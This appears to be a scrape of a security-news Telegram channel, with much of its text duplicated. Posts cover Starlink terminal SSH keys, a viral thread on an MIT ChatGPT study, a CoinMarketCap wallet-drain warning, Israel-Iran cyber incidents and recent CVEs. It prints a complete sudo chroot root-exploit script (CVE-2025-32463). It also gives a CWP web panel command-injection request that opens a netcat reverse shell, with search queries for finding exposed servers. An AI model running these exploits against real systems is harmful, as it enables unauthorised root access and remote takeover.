Do It by Code
Starlink User Terminal Teardown Article, Comments
During device initialization, if the system identifies itself as a user terminal, the initialization script automatically writes 41 SSH public keys into /root/.ssh/authorized_keys. Notably, port 22 on the UTA remains open to the local network at all times. Having such a large number of unknown login keys on a user product certainly raises eyebrows.
🤖 MIT just completed the first brain scan study of ChatGPT users & the results are terrifying.
Turns out, AI isn't making us more productive. It's making us cognitively bankrupt.
🧵 https://fxtwitter.com/itsalexvacca/status/1935343874421178762
📝 "ChatGPT users had the lowest brain engagement and 'consistently underperformed at neural, linguistic, and behavioral levels.' Over the course of several months, ChatGPT users got lazier with each subsequent essay, often resorting to copy-and-paste by the end of the study."
Turns out, AI isn't making us more productive. It's making us cognitively bankrupt.
🧵 https://fxtwitter.com/itsalexvacca/status/1935343874421178762
📝 "ChatGPT users had the lowest brain engagement and 'consistently underperformed at neural, linguistic, and behavioral levels.' Over the course of several months, ChatGPT users got lazier with each subsequent essay, often resorting to copy-and-paste by the end of the study."
🧵 Thread • FxTwitter
Alex Vacca (@itsalexvacca)
BREAKING: MIT just completed the first brain scan study of ChatGPT users & the results are terrifying.
Turns out, AI isn't making us more productive. It's making us cognitively bankrupt.
Here's what 4 months of data revealed:
(hint: we've been measuring…
Turns out, AI isn't making us more productive. It's making us cognitively bankrupt.
Here's what 4 months of data revealed:
(hint: we've been measuring…
Please open Telegram to view this post
VIEW IN TELEGRAM
X (formerly Twitter)
Officer's Notes (@officer_secret) on X
It looks like !!! @coinmarketcap is hacked…
When you browse, it asks to connect wallet and then asks for ERC20 approvals. Do not approve and use @RevokeCash if you accidentally did!
When you browse, it asks to connect wallet and then asks for ERC20 approvals. Do not approve and use @RevokeCash if you accidentally did!
So to sum things up:
we used to have a six-days war
now this is called 12-days war, apparently
Also apparently, Iran lost at least 657 people, while the other side lost 28.
these statistics aren't really reliable tho.
now the main topic:
Both sides had groups which were carrying out cyber actions against each other in this conflict, here is a list of them:
https://github.com/fastfire/IsraelIranConflict
there have been way too many cybersecurity incidents during this time, some of the major ones:
- Nobitex getting hacked and ~100 millions USD worth of cryptocurrency getting burned
- Nobitex source code leak
- Bank Melli database leak (some sources denied this tho??)
- Bank Mellat database leak
- some other cybersecurity incidents on banking systems of Iran
yeah well, sad times
if any of you guys have more information about any other incident that happened during this time, please share it in comments section (with link please)
we used to have a six-days war
now this is called 12-days war, apparently
Also apparently, Iran lost at least 657 people, while the other side lost 28.
these statistics aren't really reliable tho.
now the main topic:
Both sides had groups which were carrying out cyber actions against each other in this conflict, here is a list of them:
https://github.com/fastfire/IsraelIranConflict
there have been way too many cybersecurity incidents during this time, some of the major ones:
- Nobitex getting hacked and ~100 millions USD worth of cryptocurrency getting burned
- Nobitex source code leak
- Bank Melli database leak (some sources denied this tho??)
- Bank Mellat database leak
- some other cybersecurity incidents on banking systems of Iran
yeah well, sad times
if any of you guys have more information about any other incident that happened during this time, please share it in comments section (with link please)
CVE-2025-49144
- PoC
- patch commit
- CWE-427: Uncontrolled Search Path Element
Summary: if a fake regsvr32.exe is placed in the same folder as the Notepad++'s installer (v8.8.1 and prior), it might lead to local privilege escalation, because it gets run as system-level privilege (NT AUTHORITY\SYSTEM)
Moral of the story: when running external executables (or importing DLLs), either use their proper full path (if they are a system component), or do some validation (maybe a file signature validation? I doubt it's worth it in this particular case tho)
- PoC
- patch commit
- CWE-427: Uncontrolled Search Path Element
CVE-2025-32463: Sudo Local Privilege Escalation via chroot option
- stratascale (blog and PoC)
- sudo.ws
Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
- stratascale (blog and PoC)
- sudo.ws
Do It by Code
CVE-2025-32463: Sudo Local Privilege Escalation via chroot option Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option. - stratascale (blog and PoC) …
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
"Objects implement methods and properties on-the-fly using LLM reasoning"
https://github.com/awwaiid/gremllm
https://github.com/awwaiid/gremllm
CVE-2025-48703: RCE in Centos7 Web Panel
The vulnerability allows an attacker to bypass the authentication process and perform code injection.
Exploit:
Query:
Note: you need to know the username.
The vulnerability allows an attacker to bypass the authentication process and perform code injection.
Exploit:
curl -kis 'https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc 1.2.3.4 9999 -e /bin/bash`'
Query:
Netlas.io: http.headers.server:"cwpsrv"
Shodan: Server: “cwpsrv”
Note: you need to know the username.